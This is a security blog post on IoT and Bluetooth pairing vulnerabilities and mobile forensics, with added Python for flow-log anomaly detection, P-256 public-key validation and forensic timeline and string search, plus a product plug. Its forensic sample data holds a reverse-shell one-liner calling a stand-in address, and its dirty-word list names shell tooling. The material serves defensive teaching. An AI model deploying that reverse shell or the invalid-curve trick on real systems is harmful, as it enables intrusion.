Our daily lives are filling up with new technologies that make life simpler and more organized. That simplicity and convenience can bring a false sense of security: both IoT and Bluetooth devices are at risk from cyber-attacks.
Most of us have some type of Bluetooth device connected to our technology: a printer, a headset, or a smart hub that ties together the IoT devices in a home or office. If you own a Bluetooth headset, a Samsung SmartThings hub, a smart thermostat, doorbell or refrigerator, a music service, a wireless radio link, a time clock, an audio/video streaming device, an IP camera, a smart garage door opener or a network attached storage device, read on.
In the last few weeks some revealing public service notices have gone out, but for some reason, news outlets are not reporting on them.
First, the FBI, through its Internet Crime Complaint Center (IC3), warned that cybercriminals actively search for and compromise vulnerable Internet of Things (IoT) devices. They use compromised devices as proxies or intermediaries for Internet requests, routing malicious traffic through them for cyber-attacks and computer network exploitation. Lending weight to that notice, a recent advisory on the Samsung SmartThings Hub warned that security holes could allow attackers to break into smart locks, get into connected cameras and tamper with all manner of network-connected devices.
Compromise the hub, and you have effectively compromised the entire smart home and potentially the servers it connects back to in order to deliver its smart functions.
The identified vulnerabilities differ in the level of access they give an attacker. Many of them would be difficult to exploit in isolation; chained together, however, the 20 vulnerabilities make access considerably easier. Most homes or small offices that use a device like this give it access to sensitive data, which an attacker could leverage to read that data or to control and even monitor other devices.
Compromised IoT devices acting as proxy servers are attractive to cybercriminals because the devices sit on a legitimate network, which makes the attacker's traffic difficult to trace back to its origin. Cybercriminals may use the compromised device's IP address to carry out intrusion activity, making it difficult to filter regular traffic from malicious traffic.
How do you defend against these attacks? Reboot devices regularly, as much IoT malware lives only in memory and is removed by a reboot (a reboot does not fix the underlying weakness, so the device can be re-infected until it is patched). Change default usernames and passwords. Run anti-virus periodically and keep it up to date. Keep all IoT devices up to date and apply security patches as they are released.
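A compromised device relaying an attacker's traffic, as described above, leaves traces in the network logs even when the payloads themselves are encrypted. The following Python is an added example written for this page (it is not code from the original article or from the FBI notice). It runs two simple checks over constructed flow records: an inventoried IoT device talking to external ports its role does not need, and a device fanning out to many external hosts, which is the pattern a device turned proxy or scanner produces. The inventory, LAN prefix, threshold and log format are all assumptions for the example; a real deployment would take them from an asset register and a firewall or NetFlow export.

```python
import ipaddress
from collections import defaultdict

# Constructed inventory of IoT devices and the external ports each one
# legitimately uses (vendor cloud on 443, MQTT on 8883, NTP on 123).
# Made up for this example; a real one comes from an asset register.
INVENTORY = {
    "192.168.1.20": {"label": "ip-camera", "allowed_ports": {443, 123}},
    "192.168.1.21": {"label": "smart-hub", "allowed_ports": {443, 8883, 123}},
    "192.168.1.22": {"label": "nas",       "allowed_ports": {443, 123}},
}

# Assumed local network; traffic staying inside it is ignored by these checks.
LAN = ipaddress.ip_network("192.168.0.0/16")

# Distinct external hosts one device may contact before we treat it as
# proxy- or scanner-like. Tune per device class; 5 is an arbitrary demo value.
FANOUT_THRESHOLD = 5

# Constructed flow records: timestamp src dst dst_port proto bytes.
# The NAS suddenly probing SSH on five hosts and SMB on a sixth is the
# behaviour we want to catch. 192.168.1.50 is a laptop that is not in the
# IoT inventory and is therefore ignored here.
SAMPLE_FLOWS = """\
2019-03-01T10:00:01 192.168.1.20 52.10.1.1      443  tcp 5120
2019-03-01T10:00:05 192.168.1.20 17.253.2.2     123  udp 96
2019-03-01T10:01:00 192.168.1.21 34.200.5.5     8883 tcp 2200
2019-03-01T10:02:00 192.168.1.22 203.0.113.7    22   tcp 900
2019-03-01T10:02:01 192.168.1.22 203.0.113.8    22   tcp 900
2019-03-01T10:02:02 192.168.1.22 203.0.113.9    22   tcp 900
2019-03-01T10:02:03 192.168.1.22 203.0.113.10   22   tcp 900
2019-03-01T10:02:04 192.168.1.22 203.0.113.11   22   tcp 900
2019-03-01T10:02:05 192.168.1.22 198.51.100.4   445  tcp 1300
2019-03-01T10:02:06 192.168.1.22 192.168.1.10   445  tcp 1300
2019-03-01T10:03:00 192.168.1.50 93.184.216.34  443  tcp 7000
"""


def parse_flows(text):
    """Parse whitespace-separated flow lines into dicts; skips blank lines."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, proto, nbytes = line.split()
        flows.append({"ts": ts, "src": src, "dst": dst,
                      "port": int(port), "proto": proto, "bytes": int(nbytes)})
    return flows


def analyze(flows, inventory=INVENTORY, fanout_threshold=FANOUT_THRESHOLD):
    """Return findings for inventoried IoT devices whose outbound traffic to
    addresses outside the LAN breaks their expected port profile or fans
    out to too many external hosts."""
    unexpected = defaultdict(set)   # src -> {(dst, port)}
    external = defaultdict(set)     # src -> {dst}
    for f in flows:
        device = inventory.get(f["src"])
        if device is None or ipaddress.ip_address(f["dst"]) in LAN:
            continue                # not an IoT device, or LAN-internal traffic
        external[f["src"]].add(f["dst"])
        if f["port"] not in device["allowed_ports"]:
            unexpected[f["src"]].add((f["dst"], f["port"]))

    findings = []
    for src, device in inventory.items():
        if unexpected[src]:
            findings.append({"device": src, "label": device["label"],
                             "rule": "unexpected-port",
                             "detail": sorted(unexpected[src])})
        if len(external[src]) >= fanout_threshold:
            findings.append({"device": src, "label": device["label"],
                             "rule": "fanout",
                             "detail": len(external[src])})
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_flows(SAMPLE_FLOWS)):
        print(finding)
```

On the sample data the camera and hub stay within profile and only the NAS is flagged, once for the unexpected ports and once for the fan-out. Both rules are deliberately coarse; what makes them work is the per-device allow-list, which is cheap to maintain for IoT devices precisely because their legitimate traffic is so predictable.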
Now let's talk about the vulnerabilities of Bluetooth. So far, Apple, Broadcom, Intel and Qualcomm have confirmed that chipsets used in their devices are affected. Google, Android and Linux have yet to confirm whether they are affected, but the probability is high that they are.
How is Bluetooth exploited? Bluetooth pairing uses a key exchange between the two devices to establish encrypted communication. So you would think this is safe, right?
Wrong. A critical vulnerability has been found affecting some Bluetooth implementations that could allow an attacker within wireless range, sitting in a man-in-the-middle position during pairing, to intercept or manipulate the data exchanged between the devices.
The Bluetooth Special Interest Group (SIG) has updated the specification as a result of these vulnerabilities. Bluetooth devices are now required to validate the public key received during pairing, that is, to check that it is a genuine point on the elliptic curve before using it in the key agreement, rather than trusting whatever the other party sends.
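To make the pairing weakness and the SIG's fix concrete, here is an added example in Python; it is not code from the original article or from the Bluetooth SIG or any chipset vendor. It implements P-256, the curve Bluetooth Secure Connections uses for its ECDH exchange, in plain integer arithmetic, and contrasts an unpatched key-agreement step, which multiplies by whatever point the peer sent, with the patched one, which rejects any point that does not lie on the curve. The private scalars are fixed small values chosen for reproducibility; real devices draw random scalars. Names such as `ecdh_unpatched` and `pairing_demo` are this example's own.

```python
# P-256 (secp256r1) domain parameters; Bluetooth LE Secure Connections and
# BR/EDR Secure Simple Pairing run their ECDH exchange on this curve.
P  = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A  = P - 3
B  = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N  = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G  = (GX, GY)          # base point; None represents the point at infinity


def is_valid_public_key(point):
    """Validate a received public key: not infinity, coordinates in range,
    and the point satisfies y^2 = x^3 + Ax + B (mod P). P-256 has cofactor 1,
    so an on-curve point is automatically in the prime-order group and no
    separate small-subgroup check is needed (curves with a cofactor > 1 do)."""
    if point is None:
        return False
    x, y = point
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine addition (and doubling) on y^2 = x^3 + Ax + B over GF(P)."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:                              # p1 == -p2
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P    # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point):
    """Double-and-add scalar multiplication (not constant-time; demo only)."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def ecdh_unpatched(priv, peer_pub):
    """Pre-fix behaviour: multiply by whatever point the peer sent."""
    return scalar_mult(priv, peer_pub)


def ecdh_patched(priv, peer_pub):
    """Post-fix behaviour: refuse the point before doing any arithmetic."""
    if not is_valid_public_key(peer_pub):
        raise ValueError("peer public key is not a valid P-256 point")
    return scalar_mult(priv, peer_pub)


def pairing_demo():
    """Honest exchange, then a man-in-the-middle substituting an off-curve
    point. Returns (secrets_match, unpatched_accepted, patched_rejected)."""
    # Constructed fixed scalars for reproducibility; real devices use
    # random scalars in [1, N-1].
    alice_priv, bob_priv = 0x1234567, 0x7654321
    alice_pub = scalar_mult(alice_priv, G)
    bob_pub = scalar_mult(bob_priv, G)
    secrets_match = (ecdh_patched(alice_priv, bob_pub)
                     == ecdh_patched(bob_priv, alice_pub))

    # The attacker replaces Bob's key with a point that is NOT on P-256
    # (same x as G, y nudged by one). The formulas still "work" on it, but
    # on a different curve y^2 = x^3 + Ax + B' that the attacker controls.
    bogus = (GX, (GY + 1) % P)
    unpatched_accepted = ecdh_unpatched(alice_priv, bogus) is not None
    try:
        ecdh_patched(alice_priv, bogus)
        patched_rejected = False
    except ValueError:
        patched_rejected = True
    return secrets_match, unpatched_accepted, patched_rejected


if __name__ == "__main__":
    print(pairing_demo())   # (True, True, True)
```

The unpatched side happily derives a "shared secret" from the bogus point. That matters because the attacker can pick a point whose order on the substituted curve is small, so the secret the victim computes takes only a handful of possible values and can be recovered by trial; with the secret known, the attacker can decrypt or inject traffic, which is the man-in-the-middle outcome described above. The validation check costs one curve-equation evaluation per pairing.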
We suggest that you connect your legacy devices and update their firmware to minimize the impact on your use, and that you consider strengthening your cybersecurity gateway with intrusion solutions like those DiscoverCF.com offers in its vCISO platform. A cybersecurity platform like this, at under USD 50 per month, can cost less than what you pay for Starbucks every day.
FORENSIC ANALYSIS
The forensic process consists of the following phases:
Verification: During this stage, the forensic examiner on duty takes a careful look at the information logged by the system, the applications and the network devices to confirm that the incident actually occurred.
System description: Once verification confirms that a security incident occurred, the forensic examiner fills in a detailed system description: hardware and software characteristics, hard disk geometry and purpose, the list of users and other useful information. For a mobile phone, a detailed report of its hardware and software features can be obtained and accurately documented during this phase.
Acquisition of evidence: All data from the mobile phone must be transferred to external media or to a forensic workstation in order to perform the analysis. This operation is critical because the examiner needs to be sure that only the original data is transferred and taken into account; the analysis is then done on that copy, with its hash checked against the source, so the original is never altered. Paraben's Device Seizure v4.0 for Windows is a tool designed for this purpose that lets the examiner browse the phone's internal memory.
Timeline analysis: This is a complete list of the files in the image together with their MAC times (last modification, access and metadata change); it is very useful for tracing back system activity. The timeline shows the last time an executable file was accessed (typically, run), the last time a file or directory was created or deleted, and it can also reveal scripting activity. In this stage the forensic analyst examines the media layers thoroughly (physical, data, metadata, file system and file name), searching for evidence of suspicious binary installations and of files and directories added, removed and so on.
Search string: With this deep knowledge of the system, the analyst can now begin searching for specific strings inside files to reveal useful information. A list of standard "dirty words" can be very useful for pulling out information relevant to the compromise of the system.
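The timeline and search string phases above are mechanical enough to script. The following Python is an added example written for this page; it is not Paraben's code and not part of the original text. It builds a mactime-style timeline (the 'm.c' / '.a.' flag column follows the layout of The Sleuth Kit's mactime output) from constructed file records standing in for what an acquisition tool would list out of a phone image, and then runs a dirty-word search over the files' contents. The records, timestamps, paths and word list are all constructed for the example; `FileRecord`, `build_timeline` and `search_dirty_words` are this example's own names.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class FileRecord:
    """One entry from the image file list: path, size, MAC times (epoch
    seconds, UTC) and, for the string search, the raw content."""
    path: str
    size: int
    mtime: int        # last content modification
    atime: int        # last access (for an executable, typically last run)
    ctime: int        # last metadata change
    content: bytes = b""


def T(iso_text):
    """UTC ISO-8601 string -> epoch seconds (keeps the sample data readable)."""
    return int(datetime.fromisoformat(iso_text)
               .replace(tzinfo=timezone.utc).timestamp())


def iso(ts):
    """Epoch seconds -> 'YYYY-MM-DDTHH:MM:SSZ'."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


# Constructed records: the system shell, a hidden directory and script dropped
# by an intruder, and an untouched app database. The shell's access time
# coincides with the script's, which is the kind of link a timeline exposes.
SAMPLE_RECORDS = [
    FileRecord("/system/bin/sh", 95000,
               T("2018-11-10T08:00:00"), T("2019-03-01T10:02:03"), T("2018-11-10T08:00:00"),
               b"\x7fELF"),
    FileRecord("/data/local/tmp/.cache", 4096,
               T("2019-03-01T10:02:00"), T("2019-03-01T10:02:03"), T("2019-03-01T10:02:00")),
    FileRecord("/data/local/tmp/.cache/up.sh", 86,
               T("2019-03-01T10:02:01"), T("2019-03-01T10:02:03"), T("2019-03-01T10:02:01"),
               b"#!/system/bin/sh\nwhile true; do nc -e /system/bin/sh 203.0.113.9 4444; sleep 60; done\n"),
    FileRecord("/data/data/com.example.app/db/contacts.db", 20480,
               T("2019-02-20T12:00:00"), T("2019-02-28T09:00:00"), T("2019-02-20T12:00:00"),
               b"SQLite format 3\x00"),
]

# "Dirty words" for this case: reverse-shell tooling, the interpreter an
# implant would invoke, and the suspect remote address. Constructed list.
DIRTY_WORDS = [b"nc -e", b"/system/bin/sh", b"203.0.113", b"busybox"]


def build_timeline(records):
    """One row per (file, timestamp): 'm.c' means modified and changed at that
    instant, '.a.' means accessed only. Sorted by time, then path."""
    rows = []
    for r in records:
        for ts in {r.mtime, r.atime, r.ctime}:
            flags = ("m" if r.mtime == ts else ".") + \
                    ("a" if r.atime == ts else ".") + \
                    ("c" if r.ctime == ts else ".")
            rows.append((ts, r.path, flags, r.size))
    rows.sort(key=lambda row: (row[0], row[1]))
    return [(iso(ts), flags, size, path) for ts, path, flags, size in rows]


def search_dirty_words(records, terms=DIRTY_WORDS):
    """Case-insensitive search of each file's content for each term.
    Returns one (path, term, byte offset) tuple per hit."""
    hits = []
    for r in records:
        for term in terms:
            for m in re.finditer(re.escape(term), r.content, re.IGNORECASE):
                hits.append((r.path, term.decode(), m.start()))
    return hits


if __name__ == "__main__":
    for row in build_timeline(SAMPLE_RECORDS):
        print("%s  %s  %8d  %s" % row)
    for hit in search_dirty_words(SAMPLE_RECORDS):
        print("HIT %s  %r  @%d" % hit)
```

Reading the timeline bottom-up tells the story the text describes: the hidden directory appears at 10:02:00, the script one second later, and at 10:02:03 the script, its directory and the system shell are all accessed together, which is what running the script would look like. The dirty-word pass then lands on the same script, and the offsets let the examiner quote exactly which bytes matched in the report.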